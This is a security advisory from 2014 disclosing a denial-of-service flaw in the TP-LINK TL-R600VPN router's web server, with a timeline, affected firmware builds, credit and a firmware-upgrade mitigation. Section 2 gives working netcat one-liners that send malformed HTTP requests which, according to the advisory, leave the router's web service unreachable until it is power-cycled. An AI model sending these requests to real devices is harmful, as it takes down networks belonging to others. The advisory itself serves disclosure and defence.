0. Timeline
0.1 Discovery: 2014.05.22
0.2 Vendor response: Tickect ID 50463, Status: Open
0.3 At 2014.05.29 vendor confirmation, Status: waiting for new firmware
0.4 Disclosure: 2014.07.01

1. Background
TP-LINK is a global provider of SOHO&SMB networking products and the World's No.1 provider of WLAN products, with products available in over 120 countries to tens of millions customers[1]. TL-R600VPN is TP-Links VPN router product that is known for it's "High-security VPN Capabilities"[2].

2. httpd DoS(Denial of Service)

2.1. Power on/off needed by Dino Causevic Works Ok[3]
$ echo -e "GET / H\r\n" | nc 192.0.2.22 80 -> After that all connections timeout waiting for ever.

2.2. Power on/off Needed with Graceful Client Shutdown
$ echo -e "GET /. /\r\n\r" | nc 192.0.2.22 80
$ echo -e "GET /. /\r\n\r" | nc 192.0.2.22 80
(UNKNOWN) [192.0.2.22] 80 (http) : Connection refused
$

3. Affected Firmware

3.1 1.2.1 Build 130831 Rel.63039n

3.2 1.2.2 Build 140422 Rel.33638n

4. References
[1] http://www.tp-link.us/about/?categoryid=102
[2] http://www.tp-link.us/products/details/?categoryid=1678&model=TL-R600VPN
[3] http://www.exploit-db.com/exploits/29919/

5. Credit
Aivar Liimets, Martem[www.martem.ee]
Thanks Dino Causevic for the inspiration.

6. Mitigation
Upgrade to firmware 1.2.2 Build 140530 Rel.35298n